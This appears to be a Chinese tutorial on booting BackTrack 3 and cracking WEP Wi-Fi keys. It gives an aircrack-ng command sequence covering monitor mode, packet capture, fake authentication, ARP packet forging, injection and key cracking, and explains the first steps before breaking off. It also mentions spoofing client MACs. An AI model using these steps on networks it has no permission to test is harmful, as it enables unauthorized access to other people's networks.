使用BT3破解WEP密码详细教程

使用BT3破解WEP密码教程，目的是让大家可以了解无线网络破解的方式，从而加强自己的网络安全性。请不要用于非法目的。

这里是一个详细的BT3 Backtrack 3 破解无线网WEP的一个教程。

首先

到这个地方确认你的电脑无线网卡可以抓包，目前市上最好的设备就是无线卡王了，功率超强。

然后开始下载你需要的BT3版本：

如果随便玩玩，或者是台式机，可以下载CD版的那个，因为启动一次时间不短。如果是笔记本，硬盘又大，可以下载USB版的那个。

下载完以后，可以装到一个可以启动的U盘里面，或者直接保存到硬盘上，下面介绍如何用硬盘直接启动BT3 Backtrack 3 。

如何制作BT3启动盘

光盘版的，刻录完就好了，不提了。

USB版的，随便解压缩到某个U盘的根目录，这样，根目录下有BT3和Boot

两个文件夹。

打开一个DOS窗口，指向你的U盘目录，比如是H盘，那么

———运行———

H: +回车

cd boot

bootinst.bat

按提示，确认你的确是在你的U盘的目录下操作。然后OK了。

重启时插入U盘即可启动，如果有任何问题，请确认你的电脑打开了U盘启动，并且被放在第一启动项（ThinkPad可以指定排除某个启动项的，请检查）

或者在启动时按住F12，选择U盘启动。

如果是硬盘启动，虽然有很多办法，但是为了VISTA和XP的兼容，个人推荐DOS 启动法，即先弄一个DOS的启动，比如弄一个MouseDOS一类的，傻瓜安装，可以让电脑启动进入纯DOS状态，然后在DOS情况下，进入硬盘上解压出的那个Boot目录里面，里面有个DOS 目录，然后执行BT3.bat 即可。

建议在执行BT3.bat前，先运行一下Smartdrv.exe ,可以加快启动速度很多。（附件里有Smartdrv.exe 98版）

小提示：DOS下的启动，不会自动进入图形界面，可以通过编辑DOS目录里面的CONFIG文件来实现：

只需要在CONFIG里面，最后加上一句：

autoexec=xconf;kdm

就可以了。

我顺便修改了MouseDOS的Autoexec.bat文件，直接加上：

smartdrv.exe

D:

cd boot

cd dos

bt3.bat

这样启动直接进入了图形界面。

这时候的BT3，是全部在内存里的，也就是说，在系统内，任何对桌面和配置的改动都不会被记录，所以如果要记录文档，请不要放在桌面上。

使用BT3破解WEP密码过程

以下是破解过程

WEP 破解步骤

1) ifconfig -a

2) airmon-ng start wifi0 6

3) airodump-ng --ivs -w name -c 6 ath1

4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 -1 is -one

5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1

6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp

7) aireplay-ng -2 -r mrarp -x 1024 ath1

8) aircrack-ng -n 64 -b ap_mac name-01.ivs

以下是破解命令的解释：（运行这些命令都需要打开终端窗口，可以使用Ctrl+C 从文本文件Copy，然后Shift+Insert 粘贴入终端窗口）

1）ifconfig -a

这个命令用于找到自己的无线网卡的Mac地址。请记录下来备用。

2) airmon-ng start wifi0 6

这个命令用于将自己的无线网卡置于Monitor 模式，即类似一个AP的效果，因此可以有抓别人包的功能。

其中wifi0 是我电脑里面给无线网卡的，一般应该都是这个，第一个ifconfig -a 命令可以看得到。

wifi0 后面的那个6 ，是需要破解的AP的频道，如果不知道，可以在事前左下角开始菜单里面，找到第二项Internet 下面的倒数第二个画着无线网的一个工具，用它可以看到那些需要破解的AP的频道（Channel）。

运行命令成功以后，你会看到返回的提示显示出现一个Ath1（如果你是Athoes 的无线网卡的话就是这个，其他的可能不同，不过一般都是XXX1这样）

这个就是你的用于破解的网卡代号

这个命令，简而言之，就是把你的无线网卡置于监控模式，并且指定监控的频道。如果你发现弄错了频道，那么没关系，重新运行一遍就可以了，不过这个时候，可能就会变成Ath2...Ath3 等等，但是好像最多运行三次，然后就会失败。

3) airodump-ng --ivs -w name -c 6 ath1

这个命令比较关键，你运行以后，就会列出所有该频道的AP。

其中，6 是指你需要监控的频道，必须和第二个命令里的一样，ath1是刚才第二步出现的别名。

这个命令运行以后，显示的内容比较多，简单介绍一下：

BSSID : 其实就是AP的Mac 地址

PWR：AP信号的大小，一般，低于10，就比较麻烦了，丢包情况严重，比较难破解

RXQ：干扰的大小

Beacons：发送接受的包，参考信息，在跳说明有数据

#Data：这个比较重要，是接受到可以用来破解的特殊包，如果一直不变，那么，说明没有客户端连接，破解可能很麻烦，如果对方有大文件在下载，那么这个跳的速度非常快，10来分钟就可以有足够的包来破解了，如果跳得很慢，那么，就需要用一些特殊的方式来破解了。

CH：频道

MB：网络连接速度54就是54MB

ENC，CIPHER，AUTH

这些是加密方式，我们这次只讨论显示为WEP 和WEP+ OPN的

如果显示WPA TKIP 啥的，只能密码穷举破解，个人认为希望不大。

ESSID：这个是AP的名字，需要用到的。如果是中文貌似会出问题。因此为了阻挡别人破解，可以用中文的ESSID

过一会儿，下面会显示哪些客户端连接到了哪些AP，针对有些Mac地址加密的，很容易模拟对方客户端的Mac从而骗进去，所以不要简单地相信Mac限制功能。

这个窗口就开着好了，不用关闭，以后的命令，需要重新打开一个终端窗口操作。4）aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1

这一步开始，我们要做一些真正的破解工作，主要是针对那些客户端仅仅连接，没什么流量的AP，这种AP，#Data的增长非常慢，往往需要很长的时间才有可能取得足够的包（一般5位的密码需要10000个包左右，更多的密码就要更多的。。。。）这个时候就需要aireplay-ng 出面了，顾名思义，这个软件就是Replay，也就是说，模拟发包。

首先解释命令：

-e ap_essid 就是-e 之后加上你需要破解的essid ，比如TP-LINK ，linksys 啥的，注意大小写。

-a ap_mac 就是-a 之后加上你需要破解的AP的Mac地址，第三步BSSID就可以看得到。不需要：哦。

-h XXXXXXXXXX 就是-h 之后，加上你的无线网卡的Mac地址，在第一步你可以得到。

ath1 ，上面解释过了。

一个样板例子：

aireplay-ng -1 0 -e TP-LINK -a 001900123456 -h 001900345678 ath1